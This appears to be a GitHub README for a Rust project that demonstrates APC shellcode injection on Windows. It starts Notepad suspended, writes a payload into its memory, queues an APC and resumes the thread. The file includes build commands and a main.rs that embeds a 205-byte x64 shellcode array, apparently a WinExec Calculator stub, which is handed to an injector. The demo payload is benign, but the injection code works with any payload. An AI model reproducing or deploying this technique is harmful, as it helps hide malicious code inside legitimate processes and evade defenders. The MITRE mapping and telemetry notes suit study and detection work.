
A simple example of shellcode injection in Rust using winapi


Maherilaza/rust-shellcode-injection


Rust-shellcode-injection

Rust Platform License

A simple example of shellcode injection in Rust using the `winapi` crate.

  • The Notepad process is created in suspended mode.
  • Memory is allocated within the Notepad process for the shellcode.
  • The shellcode is written into the allocated memory space (example payload: https://github.com/boku7/x64win-DynamicNoNull-WinExec-PopCalc-Shellcode).
  • An asynchronous procedure call (APC) function is used to execute the shellcode.
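  • The Notepad process's thread is then resumed, at which point the queued APC runs the shellcode. This sequence (a process created suspended, cross-process allocation and write, a queued APC, then a thread resume) is APC injection (MITRE ATT&CK T1055.004), and each step is observable in process-creation and cross-process memory telemetry.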
# Fetch the repository and enter its directory.
git clone https://github.com/Maherilaza/rust-shellcode-injection
cd rust-shellcode-injection
# Optimised build; Cargo places release artifacts under target/release/.
cargo build --release 
use shellcode::utils::{*};
/// Entry point of the example: wraps a fixed byte payload in the crate's
/// `Ushellcode` type and calls its `inject` method.
fn main() {
    // Demo payload taken from the public proof-of-concept at
    // https://github.com/boku7/x64win-DynamicNoNull-WinExec-PopCalc-Shellcode
    // (going by that project's name, an x64 Windows stub that uses WinExec to open
    // Calculator). The length is part of the array type, so adding or dropping a byte
    // is a compile error rather than a silent truncation.
    const PAYLOAD: [u8; 205] = [
        0x48, 0x31, 0xff, 0x48, 0xf7, 0xe7, 0x65, 0x48, 0x8b, 0x58, 0x60, 0x48, 0x8b, 0x5b, 0x18,
        0x48, 0x8b, 0x5b, 0x20, 0x48, 0x8b, 0x1b, 0x48, 0x8b, 0x1b, 0x48, 0x8b, 0x5b, 0x20, 0x49,
        0x89, 0xd8, 0x8b, 0x5b, 0x3c, 0x4c, 0x01, 0xc3, 0x48, 0x31, 0xc9, 0x66, 0x81, 0xc1, 0xff,
        0x88, 0x48, 0xc1, 0xe9, 0x08, 0x8b, 0x14, 0x0b, 0x4c, 0x01, 0xc2, 0x4d, 0x31, 0xd2, 0x44,
        0x8b, 0x52, 0x1c, 0x4d, 0x01, 0xc2, 0x4d, 0x31, 0xdb, 0x44, 0x8b, 0x5a, 0x20, 0x4d, 0x01,
        0xc3, 0x4d, 0x31, 0xe4, 0x44, 0x8b, 0x62, 0x24, 0x4d, 0x01, 0xc4, 0xeb, 0x32, 0x5b, 0x59,
        0x48, 0x31, 0xc0, 0x48, 0x89, 0xe2, 0x51, 0x48, 0x8b, 0x0c, 0x24, 0x48, 0x31, 0xff, 0x41,
        0x8b, 0x3c, 0x83, 0x4c, 0x01, 0xc7, 0x48, 0x89, 0xd6, 0xf3, 0xa6, 0x74, 0x05, 0x48, 0xff,
        0xc0, 0xeb, 0xe6, 0x59, 0x66, 0x41, 0x8b, 0x04, 0x44, 0x41, 0x8b, 0x04, 0x82, 0x4c, 0x01,
        0xc0, 0x53, 0xc3, 0x48, 0x31, 0xc9, 0x80, 0xc1, 0x07, 0x48, 0xb8, 0x0f, 0xa8, 0x96, 0x91,
        0xba, 0x87, 0x9a, 0x9c, 0x48, 0xf7, 0xd0, 0x48, 0xc1, 0xe8, 0x08, 0x50, 0x51, 0xe8, 0xb0,
        0xff, 0xff, 0xff, 0x49, 0x89, 0xc6, 0x48, 0x31, 0xc9, 0x48, 0xf7, 0xe1, 0x50, 0x48, 0xb8,
        0x9c, 0x9e, 0x93, 0x9c, 0xd1, 0x9a, 0x87, 0x9a, 0x48, 0xf7, 0xd0, 0x50, 0x48, 0x89, 0xe1,
        0x48, 0xff, 0xc2, 0x48, 0x83, 0xec, 0x20, 0x41, 0xff, 0xd6,
    ];

    // `Ushellcode` and its constructor come from `shellcode::utils`; their
    // implementation is not visible in this listing.
    let mut injector: Ushellcode = Ushellcode::new_shellcode(PAYLOAD);

    // NOTE(review): the README describes this step as: Notepad created suspended,
    // memory allocated in it, payload written, an APC used to run it, thread resumed.
    // That is the APC-injection pattern (MITRE ATT&CK T1055.004); confirm against the
    // `utils` source. Whatever `inject` returns is discarded here, so a failed step is
    // not reported by `main`.
    injector.inject();
}
